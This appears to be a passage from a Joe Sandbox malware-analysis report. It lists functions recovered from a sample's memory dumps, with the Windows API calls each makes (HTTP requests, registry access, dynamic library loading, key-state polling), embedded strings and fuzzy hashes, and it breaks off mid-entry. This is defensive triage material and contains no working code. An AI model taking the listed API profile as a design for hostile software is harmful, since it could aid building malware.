DllGetClassObject, xrefs: 00D5DB01

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: feb8245b00dbbeebc0a20e492247fe643ecffc19df95ccc73fb45292a2d807cb
Instruction ID: 1812be66a6df45ffc68185fba3a3f802572b10167b30e0b93ac3fae654f82d1d
Opcode Fuzzy Hash: feb8245b00dbbeebc0a20e492247fe643ecffc19df95ccc73fb45292a2d807cb
Instruction Fuzzy Hash: 494150B1600204EFDF25CF54C884AAABBBBEF48351F1580A9AD059F215D7B1D948CBB0

Function 00D62C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D62CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00D62CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 00D62D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00DC6890,00000000), ref: 00D62D5A

Strings

0, xrefs: 00D62CA4

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 9aac85686b8daa40cf52b2ef63636729e8ad3dd2fdc50d4c8bef83344e58be0a
Instruction ID: 39447e25d3f536e10495092d62dc97e041e92d403d9edf0521579a7ffa6d2ddf
Opcode Fuzzy Hash: 9aac85686b8daa40cf52b2ef63636729e8ad3dd2fdc50d4c8bef83344e58be0a
Instruction Fuzzy Hash: 1B418030205702AFD720DF24C845B6ABBE8EF85320F18466DF9A5972D1D770E904CBB2

Function 00D7DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00D7DAD9

Part of subcall function 00D079AB: _memmove.LIBCMT ref: 00D079F9

Strings

none, xrefs: 00D7DBB4
cdecl, xrefs: 00D7DB30
stdcall, xrefs: 00D7DB5B
winapi, xrefs: 00D7DB4A

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 424a7bd7df25d42cb449121c942475a63b6ae2f0f7c2adb08711cfe871f0152e
Instruction ID: acded0ada2f93dc098d8a8f822769f07e481012a3c9a74e384e5dea970954e38
Opcode Fuzzy Hash: 424a7bd7df25d42cb449121c942475a63b6ae2f0f7c2adb08711cfe871f0152e
Instruction Fuzzy Hash: CD318370904619EFCF10EF54C8819EEB7B5FF15320B10862AE86A977D2DB71A905CBB0

Function 00D59372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D07F41: _memmove.LIBCMT ref: 00D07F82

Part of subcall function 00D5B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00D5B0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00D593F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00D59409
SendMessageW.USER32(?,00000189,?,00000000), ref: 00D59439

Part of subcall function 00D07D2C: _memmove.LIBCMT ref: 00D07D66

Strings

ComboBox, xrefs: 00D59380
ListBox, xrefs: 00D593B5

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 0c0fa9a47a653f964d27e441c5721e9ed1d72f3ca1ff024eaddb3d1f6267e0c2
Instruction ID: 40317ac8ecc77ef1999254dbce40111dc4f37a574c6000a4b02a748b30ce7295
Opcode Fuzzy Hash: 0c0fa9a47a653f964d27e441c5721e9ed1d72f3ca1ff024eaddb3d1f6267e0c2
Instruction Fuzzy Hash: 5A21F071A00108EEDF14AB64DC969FFBB68DF05320B144229FD26972E0DB345E0E8A30

Function 00D71B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00D71B40
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D71B66
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00D71B96
InternetCloseHandle.WININET(00000000), ref: 00D71BDD

Part of subcall function 00D72777: GetLastError.KERNEL32(?,?,00D71B0B,00000000,00000000,00000001), ref: 00D7278C
Part of subcall function 00D72777: SetEvent.KERNEL32(?,?,00D71B0B,00000000,00000000,00000001), ref: 00D727A1

Strings

, xrefs: 00D71B87

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: a6d4b9ac6cf1ce9434b140fa50d3482f4bf13ef2d4b1d8f1d7170be6c223e023
Instruction ID: d9ac2b2a60fcfe69e25cdd29befebcbcb7473e6e4469cf53d44354d1b8e35f7c
Opcode Fuzzy Hash: a6d4b9ac6cf1ce9434b140fa50d3482f4bf13ef2d4b1d8f1d7170be6c223e023
Instruction Fuzzy Hash: 7B219FB5600208BFEB119F689C85EBF76ECEB8A754F10822AF549E6240FB349D059771

Function 00D86656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D01D73
Part of subcall function 00D01D35: GetStockObject.GDI32(00000011), ref: 00D01D87
Part of subcall function 00D01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D01D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00D866D0
LoadLibraryW.KERNEL32(?), ref: 00D866D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00D866EC
DestroyWindow.USER32(?), ref: 00D866F4

Strings

SysAnimate32, xrefs: 00D866AB

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: f4fdde722a23752eb8cfe26365b23c61a5845c8898760d26a2e76ce3a640240d
Instruction ID: 217843ab440142af8f510381374ae338117cb82f0aeeca267226e0100b770d23
Opcode Fuzzy Hash: f4fdde722a23752eb8cfe26365b23c61a5845c8898760d26a2e76ce3a640240d
Instruction Fuzzy Hash: 14218B71200246ABEF106F64EC82EBB37ADEF59378F144629FA51D2190E771CC519770

Function 00D6703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00D6705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00D67091
GetStdHandle.KERNEL32(0000000C), ref: 00D670A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00D670DD

Strings

nul, xrefs: 00D670D8

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 41294a5a59ff6834ffb20e80047ddbde237ea2749547f4972440c6e5c0061729
Instruction ID: 2814ef1b8271df9e572dba004cde92f25f3326b73baa963c7ffba22ae7d0c9f6
Opcode Fuzzy Hash: 41294a5a59ff6834ffb20e80047ddbde237ea2749547f4972440c6e5c0061729
Instruction Fuzzy Hash: B4215C74608309ABDB209F28DC05A9A77B8BF44728F244A29FCA1D72D0E771D8508B70

Function 00D6710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00D6712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00D6715D
GetStdHandle.KERNEL32(000000F6), ref: 00D6716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00D671A8

Strings

nul, xrefs: 00D671A3

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 3e27083e7fb5c0854d34c7b71ee422550e046a49c5c5fa58f3d203365614d539
Instruction ID: f247670797804e3d6fb298475f7150b796df4ddd34e26def480fa9727b8e912e
Opcode Fuzzy Hash: 3e27083e7fb5c0854d34c7b71ee422550e046a49c5c5fa58f3d203365614d539
Instruction Fuzzy Hash: F921A175604309ABDB209F689C04A9AB7A8AF56738F24061AFCB1D32D0D77498418B70

Function 00D6AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00D6AEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00D6AF13
__swprintf.LIBCMT ref: 00D6AF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,00D8F910), ref: 00D6AF6A

Strings

%lu, xrefs: 00D6AF26

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 3e813801fb3682313041bb4b7aa11163c20bcf9646181bc063488274a2d7f974
Instruction ID: 0d7cd760328b637fd7b8917026e7a5f4740b0a53df398c4d79f2ce677483d75a
Opcode Fuzzy Hash: 3e813801fb3682313041bb4b7aa11163c20bcf9646181bc063488274a2d7f974
Instruction Fuzzy Hash: 59217435600209AFCB10EF65D885EAEB7B8EF49714B004069F909EB252DB31EA45CB31

Function 00D5A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D07D2C: _memmove.LIBCMT ref: 00D07D66

Part of subcall function 00D5A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00D5A399
Part of subcall function 00D5A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D5A3AC
Part of subcall function 00D5A37C: GetCurrentThreadId.KERNEL32 ref: 00D5A3B3
Part of subcall function 00D5A37C: AttachThreadInput.USER32(00000000), ref: 00D5A3BA

GetFocus.USER32 ref: 00D5A554

Part of subcall function 00D5A3C5: GetParent.USER32(?), ref: 00D5A3D3

GetClassNameW.USER32(?,?,00000100), ref: 00D5A59D
EnumChildWindows.USER32(?,00D5A615), ref: 00D5A5C5
__swprintf.LIBCMT ref: 00D5A5DF

Strings

%s%d, xrefs: 00D5A5D9

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 2c31ebe80090959265f73a50e5bb6703fee6829de48276e12569fc75c27a4b5f
Instruction ID: 714ff8e1af6be58f9bedadc1dc254a799bd80d3561ab3929d6fac09b835dbaa1
Opcode Fuzzy Hash: 2c31ebe80090959265f73a50e5bb6703fee6829de48276e12569fc75c27a4b5f
Instruction Fuzzy Hash: 1411D271600218ABDF10BFA8DC86FEE3778EF48702F044175BD08AA192DA7059498B31

Function 00D62017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00D62048

Strings

EXISTS, xrefs: 00D62070
APPEND, xrefs: 00D62081
KEYS, xrefs: 00D6205F
REMOVE, xrefs: 00D6204E

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: ad8c317d749a11148c342989df410c519e0e81d30187162ece9bb0664b6299a3
Instruction ID: f1d06c464c9e9c5802aad6a5856960ae6a78891a1aca582c5ecffd96cc35a761
Opcode Fuzzy Hash: ad8c317d749a11148c342989df410c519e0e81d30187162ece9bb0664b6299a3
Instruction Fuzzy Hash: BE112A3091021ADFCF00EFA8D8415FEB7B4FF25304B508569D856A7352EB326906CB70

Function 00D7EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00D7EF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00D7EF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00D7F07E
CloseHandle.KERNEL32(?), ref: 00D7F0FF

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: ca7d48f70e7e1e27b4baee425cebb54167e89200e476b163f56e54c0e61c2254
Instruction ID: a19838bda2cfd8d30c1e8fd50eee68912181b2c752273dc25725f3520ed62338
Opcode Fuzzy Hash: ca7d48f70e7e1e27b4baee425cebb54167e89200e476b163f56e54c0e61c2254
Instruction Fuzzy Hash: 3C814DB16047009FD720DF28C896B6AB7E5EF48720F54881DF999DB3D2DAB1AC408B61

Function 00D802C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D07F41: _memmove.LIBCMT ref: 00D07F82

Part of subcall function 00D810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D80038,?,?), ref: 00D810BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D80388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D803C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00D8040E
RegCloseKey.ADVAPI32(?,?), ref: 00D8043A
RegCloseKey.ADVAPI32(00000000), ref: 00D80447

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 6a55dbb1c5afb7290b0af4ad788515b91d8b0c3faf834d13c98ec3ace79c6897
Instruction ID: a672482085b0cb23fc9cf14b0e245c3cf086b4055515d6440dcbf85058caf5f7
Opcode Fuzzy Hash: 6a55dbb1c5afb7290b0af4ad788515b91d8b0c3faf834d13c98ec3ace79c6897
Instruction Fuzzy Hash: 2B512C71208204AFD704EF64D891F6EBBE8FF88714F44892DB59997291DB30E909CB72

Function 00D7DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00D09997: __itow.LIBCMT ref: 00D099C2
Part of subcall function 00D09997: __swprintf.LIBCMT ref: 00D09A0C

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00D7DC3B
GetProcAddress.KERNEL32(00000000,?), ref: 00D7DCBE
GetProcAddress.KERNEL32(00000000,00000000), ref: 00D7DCDA
GetProcAddress.KERNEL32(00000000,?), ref: 00D7DD1B
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00D7DD35

Part of subcall function 00D05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00D67B20,?,?,00000000), ref: 00D05B8C
Part of subcall function 00D05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00D67B20,?,?,00000000,?,?), ref: 00D05BB0

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 052f8ddac11bbb504262342564ca484e9851cb81cace2cb36c65573e6ca63d66
Instruction ID: 5906318c185207311c1c62f66970b2d3aadaba71996349a526afe77b3f9f6a5e
Opcode Fuzzy Hash: 052f8ddac11bbb504262342564ca484e9851cb81cace2cb36c65573e6ca63d66
Instruction Fuzzy Hash: B1511735A00205DFDB11EFA8C4949ADB7F5EF48310B18C069E859AB352DB70ED45CFA0

Function 00D6E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00D6E88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00D6E8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00D6E8F2

Part of subcall function 00D09997: __itow.LIBCMT ref: 00D099C2
Part of subcall function 00D09997: __swprintf.LIBCMT ref: 00D09A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00D6E917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00D6E91F

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 35653fb8b3a4269b58b8c3041513462271bef72e6c6a29a519a4779c1901716c
Instruction ID: ba997eccb452e255a3a4c63fb0b08e09d290558eab6a5d79d79b60c8394b09fa
Opcode Fuzzy Hash: 35653fb8b3a4269b58b8c3041513462271bef72e6c6a29a519a4779c1901716c
Instruction Fuzzy Hash: AC510C39A10205DFCB01DF64D991AAEBBF5EF08314B148099E849AB3A2DB71ED11DF70

Function 00D8A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3e7ec2edb87b630933c19901da6caf45b462094787654746fd8a0502617988d
Instruction ID: 5f23acab6ed3c907442cd665df0effa86d798fd9d7bf81c0ce2711239282bd77
Opcode Fuzzy Hash: d3e7ec2edb87b630933c19901da6caf45b462094787654746fd8a0502617988d
Instruction Fuzzy Hash: 3241D275900214ABE720EFACCC48FA9BBA4EB09310F190166E855E72E1D770ED41DB71

Function 00D02344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00D02357
ScreenToClient.USER32(00DC67B0,?), ref: 00D02374
GetAsyncKeyState.USER32(00000001), ref: 00D02399
GetAsyncKeyState.USER32(00000002), ref: 00D023A7

Memory Dump Source

